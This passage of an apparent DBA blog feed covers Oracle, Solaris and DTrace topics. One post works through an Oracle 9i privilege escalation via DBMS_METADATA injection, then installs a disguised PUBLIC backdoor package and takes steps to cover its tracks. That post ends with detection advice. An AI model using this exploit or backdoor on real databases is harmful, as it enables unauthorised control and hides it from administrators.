	&lt;li&gt;Transaction throughput (number of transactions per minute)&lt;/li&gt;
	&lt;li&gt;Average response time for each transaction type&lt;/li&gt;
&lt;/ul&gt; We will perform a run of the benchmark 5 times for each configuration we want to compare and then present the average of the measurements below. So we will run the tests 5 times with buffered I/O and then 5 times with un-buffered I/O by setting the &lt;code&gt;FILESYSTEMIO_OPTIONS&lt;/code&gt; parameter.&lt;/p&gt;

&lt;p&gt;So the comparisons from these 2 measurements are as follows:&lt;/p&gt;
&lt;a href='http://4.bp.blogspot.com/_heUWGgTt1gk/STIMDvZVpMI/AAAAAAAAA5U/UNq_9k2HGN4/s1600-h/tab2.JPG'&gt;&lt;img src='http://4.bp.blogspot.com/_heUWGgTt1gk/STIMDvZVpMI/AAAAAAAAA5U/UNq_9k2HGN4/s320/tab2.JPG' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 55px;' /&gt;&lt;/a&gt;
&lt;p&gt;While these tests were not very conclusive or thorough, they do show how Swingbench can be used for generating database activity. The measurements which I compared are only some of the measurements which Swingbench reports when finished running a benchmark. Hopefully I will be able to play and post a bit more on the excellent Swingbench utility in the future.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>OCFS2 Mount by Label Support</title>
   <link href="http://posulliv.github.com/2008/11/25/ocfs2-mount-by-label-support"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/ocfs2-mount-by-label-support</id>
   <content type="html">&lt;p&gt;While messing around with OCFS2 on my RHEL4 install, I discovered that if I created an OCFS2 filesystem with a label, I was unable to mount it by that label. I would encounter the following:&lt;/p&gt;
&lt;pre&gt;
# mount -L &quot;oradata&quot; /ocfs2
mount: no such partition found
&lt;/pre&gt;
&lt;p&gt;I found this quite strange and did some investigation. The version of util-linux that was present on my system after a fresh RHEL 4 install was &lt;em&gt;util-linux-2.12a-16.EL4.6&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;So I grabbed the latest version of util-linux from Red Hat and voilà, I am now able to mount an OCFS2 filesystem by its label.&lt;/p&gt;
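&lt;p&gt;With the updated package in place, the same command now succeeds:&lt;/p&gt;
&lt;pre&gt;
# mount -L &quot;oradata&quot; /ocfs2
#
&lt;/pre&gt;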

&lt;p&gt;The current version of util-linux on my system is &lt;em&gt;util-linux-2.12a-16.EL4.20&lt;/em&gt;.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Observing Oracle I/O Access Patterns with DTrace</title>
   <link href="http://posulliv.github.com/2008/11/25/observing-oracle-io-access-patterns-with-dtrace"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/observing-oracle-io-access-patterns-with-dtrace</id>
   <content type="html">In this post, I will use the &lt;code&gt;seeks.d&lt;/code&gt; and &lt;code&gt;iopattern&lt;/code&gt; DTrace scripts, which are available as part of the &lt;a href=&quot;http://www.opensolaris.org/os/community/dtrace/dtracetoolkit/&quot;&gt;DTraceToolKit&lt;/a&gt; (This toolkit is an extremely useful collection of scripts created by &lt;a href=&quot;http://www.brendangregg.com/&quot;&gt;Brendan Gregg&lt;/a&gt;), to view the I/O access patterns typical of Oracle. DTrace is able to capture data throughout the kernel and so the job of finding access patterns has been greatly simplified.&lt;br&gt;

The system on which these examples are being run has redo logs on one disk, datafiles on another, and the control file on a third.&lt;br&gt;

To get system-wide access patterns, the &lt;code&gt;iopattern&lt;/code&gt; script can be used. Sample output is as follows:

&lt;pre&gt;
# ./iopattern
%RAN %SEQ  COUNT    MIN    MAX    AVG     KR     KW
 100    0      7   4096   8192   7606      4     48
   0    0      0      0      0      0      0      0
   0    0      0      0      0      0      0      0
 100    0      6   8192   8192   8192      0     48
   0    0      0      0      0      0      0      0
   0    0      0      0      0      0      0      0
 100    0      6   8192   8192   8192      0     48
   0    0      0      0      0      0      0      0
   0    0      0      0      0      0      0      0
 100    0      6   8192   8192   8192      0     48
   0    0      0      0      0      0      0      0
&lt;/pre&gt;

This output was generated on an idle system (0.04 load). You can see that the &lt;code&gt;iopattern&lt;/code&gt; script provides the percentage of random and sequential I/O on the system. During this monitoring period while the system was idle, all the I/O was random. The iopattern script also provides the number and total size of the I/O operations performed during the sample period, and it provides the minimum, maximum, and average I/O sizes.&lt;br&gt;
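The script also accepts an optional interval and count, as most DTraceToolkit scripts do; for example, the following would sample every 5 seconds for one minute:

&lt;pre&gt;
# ./iopattern 5 12
&lt;/pre&gt;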

Now, look at the output generated from the &lt;code&gt;iopattern&lt;/code&gt; script during a period of heavy database load:

&lt;pre&gt;
# ./iopattern
%RAN %SEQ  COUNT    MIN    MAX    AVG     KR     KW
  92    8     69   4096   8192   6589    304    140
  86   14     69   4096   8192   5995    228    176
  82   18     67   4096   8192   5257     64    280
  84   16     19   4096   8192   6036     40     72
  77   23     22   4096   8192   4282      0     92
  88   12     68   4096 1015808  21744   1120    324
  97    3     67   4096   8192   7274    400     76
  89   11     66   4096   8192   6392    276    136
  90   10     71   4096   8192   6345    216    224
  87   13     62   4096   8192   5879    184    172
  90   10     10   4096   8192   6553     40     24
 100    0     17   8192   8192   8192     88     48
  87   13     33   4096 1048576  38353   1168     68
  86   14     65   4096   8192   6049    236    148
&lt;/pre&gt;

As you can see from the above output, the majority of the I/O which occurs during this period is random. In my mind, this is one indication that the type of I/O typical in an OLTP environment is random (as we would expect).&lt;br&gt;

To get the I/O distribution for each disk, the &lt;code&gt;seeks.d&lt;/code&gt; script can be used. This script measures the seek distance for disk events and generates a distribution plot. This script is based on the &lt;code&gt;seeksize.d&lt;/code&gt; script provided with the DTraceToolKit and is available in the &lt;a href=&quot;http://www.solarisinternals.com/&quot;&gt;Solaris Internals&lt;/a&gt; volumes.&lt;br&gt;
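The core idea is small enough to sketch in a few lines of D. The following is an approximation in the spirit of seeksize.d (not the toolkit script verbatim): it remembers, per device, where the last I/O ended and plots the distance to where the next one begins:

&lt;pre&gt;
#!/usr/sbin/dtrace -s

self int last[dev_t];

/* on each disk I/O, record the distance (in 512-byte blocks) from
   where the previous I/O on the same device finished */
io:::start
/self-&gt;last[args[0]-&gt;b_edev] != 0/
{
    this-&gt;dist = (int)(args[0]-&gt;b_blkno - self-&gt;last[args[0]-&gt;b_edev]);
    @seeks[args[1]-&gt;dev_statname] =
        quantize(this-&gt;dist &gt; 0 ? this-&gt;dist : -this-&gt;dist);
}

/* remember the block just past the end of this I/O */
io:::start
{
    self-&gt;last[args[0]-&gt;b_edev] = args[0]-&gt;b_blkno +
        args[0]-&gt;b_bcount / 512;
}
&lt;/pre&gt;

Zero-distance events indicate sequential access, while large distances indicate random I/O.&lt;br&gt;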

Sample output from the &lt;code&gt;seeks.d&lt;/code&gt; script is shown below:

&lt;pre&gt;
# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

cmdk0
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@                    43
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |                                         0
           16 |                                         0
           32 |                                         0
           64 |                                         0
          128 |@@@@@@@@@@@@@                            26
          256 |@@@@@@                                   12
          512 |                                         0

sd1
        value  ------------- Distribution ------------- count
        32768 |                                         0
        65536 |@@@@@@@@@@@@@@@@@@@@                     1
       131072 |                                         0
       262144 |                                         0
       524288 |                                         0
      1048576 |@@@@@@@@@@@@@@@@@@@@                     1
      2097152 |                                         0
&lt;/pre&gt;

As before, this output was generated while the system was idle. It summarizes the seeks performed by each disk on the system. The &lt;code&gt;sd1&lt;/code&gt; disk in the output above is the disk on which my Oracle datafiles reside. The value column in the output indicates the size of the seek that was performed in bytes. This indicates some random I/O on this disk since the seek lengths are quite large. The disk on which the redo logs are located does not show up in the output above since no I/O is being generated on that disk (&lt;code&gt;sd2&lt;/code&gt;).

Now, it is interesting to look at the output generated from the &lt;code&gt;seeks.d&lt;/code&gt; script during a period when the database is under a heavy load.

&lt;pre&gt;
# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

cmdk0
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@@@                  18
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |                                         0
           16 |                                         0
           32 |                                         0
           64 |                                         0
          128 |@@@@@@@@@@@@@                            10
          256 |@@@@@                                    4
          512 |                                         0

sd2
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@           430
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |@@@@@@@@                                 120
           16 |@                                        11
           32 |                                         3
           64 |                                         0
          128 |                                         0
          256 |                                         0
          512 |                                         0
         1024 |                                         0
         2048 |                                         0
         4096 |                                         0
         8192 |                                         0
        16384 |                                         0
        32768 |                                         0
        65536 |                                         6
       131072 |                                         0

sd1
        value  ------------- Distribution ------------- count
          512 |                                         0
         1024 |@@@                                      31
         2048 |                                         5
         4096 |                                         0
         8192 |                                         0
        16384 |                                         0
        32768 |                                         0
        65536 |@@                                       23
       131072 |@@@@@@@@                                 92
       262144 |@@@@@@@                                  73
       524288 |@                                        6
      1048576 |                                         4
      2097152 |@                                        14
      4194304 |@@@                                      29
      8388608 |@@@@                                     40
     16777216 |@@@@@                                    56
     33554432 |@@@@@@                                   65
     67108864 |                                         0
&lt;/pre&gt;

This time the disk on which the redo logs are located shows up as there is activity occurring on it. You can see that most of this activity is sequential as most of the events incurred a zero length seek. This makes sense as the log writer background process (LGWR) writes the redo log files in a sequential manner. However, you can see that I/O on the disk which contains the Oracle datafiles is random as seen by the distributed seek lengths (up to the 33554432 to 67108864 bucket).&lt;br&gt;

The above post did not really contain any new information, but I thought it would be cool to show a tiny bit of what DTrace makes possible. This is one of the coolest tools I have used in the last year and is one of the many reasons why I have become a huge Solaris fan!
</content>
 </entry>
 
 <entry>
   <title>Installing &amp; Configuring a USB NIC on Solaris</title>
   <link href="http://posulliv.github.com/2008/11/25/installing-configuring-a-usb-nic-on-solaris"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/installing-configuring-a-usb-nic-on-solaris</id>
   <content type="html">&lt;p&gt;In this post, I will provide a very quick overview of how to install and configure a USB network interface on Solaris.&lt;/p&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Obtaining the USB Driver&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;The driver for a generic USB network interface which should cover the majority of USB NIC devices can be downloaded from &lt;a href='http://homepage2.nifty.com/mrym3/taiyodo/upf-0.8.0.tar.gz'&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Installing the USB Driver&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;After downloading the driver, uncompress the gunzipped file and extract the archive as the root user.&lt;/p&gt;
&lt;pre&gt;
# gunzip upf-0.8.0.tar.gz ; tar xvf upf-0.8.0.tar
&lt;/pre&gt;
&lt;p&gt;This will create a &lt;code&gt;upf-0.8.0&lt;/code&gt; directory in the current directory. Change to the &lt;code&gt;upf-0.8.0&lt;/code&gt; directory. Now we need to perform the following to install the driver:&lt;/p&gt;
&lt;pre&gt;
# make install
# ./adddrv.sh
&lt;/pre&gt;
&lt;p&gt;After this has been completed, the driver has been installed but the system needs to be rebooted before we can use the new driver. Reboot the system using the following procedure:&lt;/p&gt;
&lt;pre&gt;
# touch /reconfigure
# shutdown -i0 -g0 -y
&lt;/pre&gt;
&lt;p&gt;This will scan for new hardware on reboot. The new NIC device will show up as &lt;code&gt;/dev/upf0&lt;/code&gt;.&lt;/p&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Configuring the NIC Device&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;Once the USB driver has been installed and the system has been rebooted correctly, the NIC device can be configured as follows. (In this example, we will just make up an IP address to use).&lt;/p&gt;
&lt;pre&gt;
# ifconfig upf0 plumb
# ifconfig upf0 192.168.2.111 netmask 255.255.255.0 up
&lt;/pre&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Making Sure the NIC Device Starts on Boot&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;To ensure that the new NIC device starts automatically on boot, we need to create an &lt;code&gt;/etc/hostname.upf0&lt;/code&gt; file for the interface containing either the IP address configured for that interface or, if we placed the IP address in the &lt;code&gt;/etc/inet/hosts&lt;/code&gt; file, the hostname for that interface.&lt;/p&gt;
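&lt;p&gt;For example, using the made-up address from above:&lt;/p&gt;
&lt;pre&gt;
# echo &quot;192.168.2.111&quot; &gt; /etc/hostname.upf0
&lt;/pre&gt;</content>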
 </entry>
 
 <entry>
   <title>Installing a Back Door in Oracle 9i</title>
   <link href="http://posulliv.github.com/2008/11/25/installing-a-back-door-in-oracle-9i"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/installing-a-back-door-in-oracle-9i</id>
   <content type="html">In this post, we will demonstrate a way an attacker could install a back door in a 9i Oracle database. The information on this post is based on information obtained from &lt;a href=&quot;http://www.petefinnigan.com/&quot;&gt;Pete Finnigin's website&lt;/a&gt; and the &lt;a href=&quot;http://www.2600.com/&quot;&gt;2600 magazine&lt;/a&gt;. The version of the database we are using in this post is:

&lt;pre&gt;
sys@ORA9R2&gt; select * from v$version;
BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production
&lt;/pre&gt;

&lt;h2&gt;Creating the User&lt;/h2&gt;
In this example, we will create a user that we will install the back door with. We will presume that either an attacker has already gained access to this account or that a legitimate user wishes to install a back door in our database (the so-called insider threat). The user we will install the back door as is testUser. We will only grant &lt;code&gt;CONNECT&lt;/code&gt; and &lt;code&gt;RESOURCE&lt;/code&gt; to this user.

&lt;pre&gt;
sys@ORA9R2&gt; create user testUser identified by testUser;

User created.

sys@ORA9R2&gt; grant connect, resource to testUser;

Grant succeeded.

sys@ORA9R2&gt; connect testUser/testUser
Connected.
testuser@ORA9R2&gt; select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER RESOURCE     NO  YES NO

testuser@ORA9R2&gt;
&lt;/pre&gt;

&lt;h2&gt;Gaining DBA Privileges&lt;/h2&gt;

Now we will use a known exploit in the 9i version of Oracle that will allow this user to obtain the DBA role. This exploit is described in the document 'Many Ways to Become DBA' by &lt;a href=&quot;http://www.petefinnigan.com/&quot;&gt;Pete Finnigan&lt;/a&gt;. This exploit involves creating a function and then exploiting a known vulnerability in the DBMS_METADATA package.

&lt;pre&gt;
testuser@ORA9R2&gt; create or replace function testuser.hack return varchar2
2 authid current_user is
3 pragma autonomous_transaction;
4 begin
5 execute immediate 'grant dba to testUser';
6 return '';
7 end;
8 /

Function created.

testuser@ORA9R2&gt; select sys.dbms_metadata.get_ddl('''||testuser.hack()||''','')
2 from dual;
ERROR:
ORA-31600: invalid input value '||testuser.hack()||' for parameter OBJECT_TYPE in
function GET_DDL
ORA-06512: at &quot;SYS.DBMS_SYS_ERROR&quot;, line 105
ORA-06512: at &quot;SYS.DBMS_METADATA_INT&quot;, line 1536
ORA-06512: at &quot;SYS.DBMS_METADATA_INT&quot;, line 1900
ORA-06512: at &quot;SYS.DBMS_METADATA_INT&quot;, line 3606
ORA-06512: at &quot;SYS.DBMS_METADATA&quot;, line 504
ORA-06512: at &quot;SYS.DBMS_METADATA&quot;, line 560
ORA-06512: at &quot;SYS.DBMS_METADATA&quot;, line 1221
ORA-06512: at line 1

no rows selected

testuser@ORA9R2&gt; select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER DBA          NO  YES NO
TESTUSER RESOURCE     NO  YES NO

testuser@ORA9R2&gt;
&lt;/pre&gt;

As you can see from the output above, the attacker has now gained the DBA role. Now, the attacker can start working on installing the back door.

&lt;h2&gt;Creating and Installing the Back Door&lt;/h2&gt;
First, the attacker can save the encrypted form of the SYS user's password before installing the back door.

&lt;pre&gt;
testuser@ORA9R2&gt; select username, password
2 from dba_users
3 where username = 'SYS' ;

USERNAME PASSWORD
-------- ------------------------------
SYS      43CA255A7916ECFE

testuser@ORA9R2&gt;
&lt;/pre&gt;

Next, the attacker wants to install the back door as the SYS user, so he/she alters the SYS password in order to connect as SYS. Once finished installing the back door, the attacker will change this password back to the saved value.&lt;br&gt;

&lt;pre&gt;
testuser@ORA9R2&gt; alter user sys identified by pass;
User altered.
testuser@ORA9R2&gt; connect sys/pass as sysdba
Connected.
testuser@ORA9R2&gt;
&lt;/pre&gt;

Now the attacker is connected as the SYS user and can start creating the back door, like so:

&lt;pre&gt;
testuser@ORA9R2&gt; CREATE OR REPLACE PACKAGE dbms_xml AS
2 PROCEDURE parse (string IN VARCHAR2);
3 END dbms_xml;
4 /
Package created.
testuser@ORA9R2&gt;
CREATE OR REPLACE PACKAGE BODY dbms_xml AS
  PROCEDURE parse (string IN VARCHAR2) IS
    var1 VARCHAR2 (100);
  BEGIN
    IF string = 'unlock' THEN
      SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS';
      EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
      EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
      COMMIT;
      EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY padraig';
    END IF;
    IF string = 'lock' THEN
      EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
      EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
      EXECUTE IMMEDIATE 'DROP TABLE syspa1';
    END IF;
    IF string = 'make' THEN
      EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY padraig';
      EXECUTE IMMEDIATE 'GRANT DBA TO hill';
    END IF;
    IF string = 'unmake' THEN
      EXECUTE IMMEDIATE 'DROP USER hill CASCADE';
    END IF;
  END;
END dbms_xml;
/

testuser@ORA9R2&gt; CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml;

Synonym created.

testuser@ORA9R2&gt; GRANT EXECUTE ON dbms_xml TO PUBLIC;

Grant succeeded.

testuser@ORA9R2&gt;
&lt;/pre&gt;

This package does the following (examples are shown below):
&lt;ul&gt;
	&lt;li&gt;'unlock' saves the current SYS password hash and changes the SYS password to a known value (in this case 'padraig').&lt;/li&gt;
	&lt;li&gt;'lock' reverts the SYS account's password back to the saved original.&lt;/li&gt;
	&lt;li&gt;'make' creates a new user account with a known password that holds the DBA role, and 'unmake' drops that account from the database.&lt;/li&gt;
&lt;/ul&gt;

The attacker has now created a back door that can be very difficult to discover, choosing a package name that looks like it was installed with the Oracle database. Next, the attacker changes the SYS user's password back to its original value so the DBA does not notice that the SYS account has been hijacked, and revokes the DBA role from his/her own account to avoid detection. The role is no longer needed now that the back door is installed.&lt;br&gt;

&lt;pre&gt;
testuser@ORA9R2&gt; alter user sys identified by values '43CA255A7916ECFE';

User altered.

testuser@ORA9R2&gt; revoke dba from testUser;

Revoke succeeded.

testuser@ORA9R2&gt; disconnect
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
testuser@ORA9R2&gt; connect testUser/testUser
Connected.
testuser@ORA9R2&gt; select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER RESOURCE     NO  YES NO
&lt;/pre&gt;

In the first example, the attacker uses the back door to unlock the SYS account and connect as the SYS user.

&lt;pre&gt;
testuser@ORA9R2&gt; execute dbms_xml.parse('unlock');

PL/SQL procedure successfully completed.

testuser@ORA9R2&gt; connect sys/padraig as sysdba
Connected.
testuser@ORA9R2&gt; show user
USER is &quot;SYS&quot;
testuser@ORA9R2&gt;
&lt;/pre&gt;

When finished working as the SYS user, the attacker changes the SYS password back to the original by calling the back door again:
&lt;pre&gt;
testuser@ORA9R2&gt; execute dbms_xml.parse('lock');

PL/SQL procedure successfully completed.

testuser@ORA9R2&gt;
&lt;/pre&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;

This post showed how an attacker could exploit a known vulnerability in Oracle 9i to obtain DBA privileges and install a back door in an Oracle database. Of course, a wary DBA could detect this activity by auditing the &lt;code&gt;ALTER USER&lt;/code&gt; statement and by periodically checking for unexpected &lt;code&gt;SYS&lt;/code&gt;-owned objects, as sketched below.
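
To make that concrete, here is a rough sketch of the kind of checks a DBA might run (the &lt;code&gt;AUDIT&lt;/code&gt; statement and the data dictionary views below are standard Oracle features, but the specific queries are my own suggestion rather than something from the exploit write-up):

&lt;pre&gt;
sys@ORA9R2&gt; AUDIT ALTER USER;

Audit succeeded.

sys@ORA9R2&gt; SELECT username, timestamp
  2  FROM dba_audit_trail
  3  WHERE action_name = 'ALTER USER';

sys@ORA9R2&gt; SELECT object_name, object_type, created
  2  FROM dba_objects
  3  WHERE owner = 'SYS'
  4  AND created &gt; SYSDATE - 7;
&lt;/pre&gt;

Note that auditing must already be enabled (the &lt;code&gt;AUDIT_TRAIL&lt;/code&gt; parameter set to something other than NONE) for the audit trail query to return anything.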
</content>
 </entry>
 
 <entry>
   <title>Generating a System State Dump on HP-UX with gdb</title>
   <link href="http://posulliv.github.com/2008/11/25/generating-a-system-state-dump-on-hp-ux-with-gdb"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/generating-a-system-state-dump-on-hp-ux-with-gdb</id>
   <content type="html">I have previously used the gdb (GNU Debugger) to generate oracle system state dumps on Linux systems by attaching to an Oracle process. The ability to do this has been well documented by Oracle on &lt;a href=&quot;http://metalink.oracle.com/&quot;&gt;Metalink&lt;/a&gt; (Note 121779.1) and in &lt;a href=&quot;http://el-caro.blogspot.com/search/label/systemstate%20dump&quot;&gt;other locations&lt;/a&gt;.&lt;br&gt;

The problem is that this does not work on the HP-UX platform, which I discovered at the worst possible time: while trying to generate a system state dump during a database hang!&lt;br&gt;

Apparently, the Oracle executable needs to be re-linked on the HP-UX platform before gdb can generate system state dumps by attaching to an Oracle process.&lt;br&gt;

You can see all the gory details in Metalink Note 273324.1. I posted it here as I thought it would be useful to have this information written down somewhere should I forget it in the future...
</content>
 </entry>
 
 <entry>
   <title>Auditing SYSDBA Users</title>
   <link href="http://posulliv.github.com/2008/11/25/audting-sysdba-users"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/audting-sysdba-users</id>
   <content type="html">I recently came accross this feature in Oracle introduced in 9i where all operations performed by a user connecting as SYSDBA are logged to an OS file. I'm sure most DBA's are familiar with this feature already but I have only just been enlightened!&lt;br&gt;

To enable this feature, auditing must be enabled and the &lt;code&gt;AUDIT_SYS_OPERATIONS&lt;/code&gt; parameter must be set to &lt;code&gt;TRUE&lt;/code&gt;. For example:

&lt;pre&gt;
sys@ORCLINS1&gt; ALTER SYSTEM SET AUDIT_SYS_OPERATIONS = TRUE SCOPE=SPFILE;
&lt;/pre&gt;

FALSE is the default value for this parameter. As the SCOPE=SPFILE clause above suggests, the database must be restarted for the parameter to take effect.&lt;br&gt;

All audit records are then written to an operating system file. The location of this file is determined by the &lt;code&gt;AUDIT_FILE_DEST&lt;/code&gt; parameter.

&lt;pre&gt;
sys@ORCLINS1&gt; show parameter AUDIT_FILE_DEST

NAME            TYPE   VALUE
--------------- ------ ------------------------------------
audit_file_dest string /oracle/oracle/admin/orclpad/adump

sys@ORCLINS1&gt;
&lt;/pre&gt;

An audit file is created for each session started by a user logging in as SYSDBA, and the file name contains the process ID of the server process that Oracle started for that session (on Unix platforms the files are typically named along the lines of ora_&lt;pid&gt;.aud).&lt;br&gt;

Most people are probably already familiar with this handy feature, but I like to have it documented somewhere for myself, so I put it here!
</content>
 </entry>
 
 
</feed>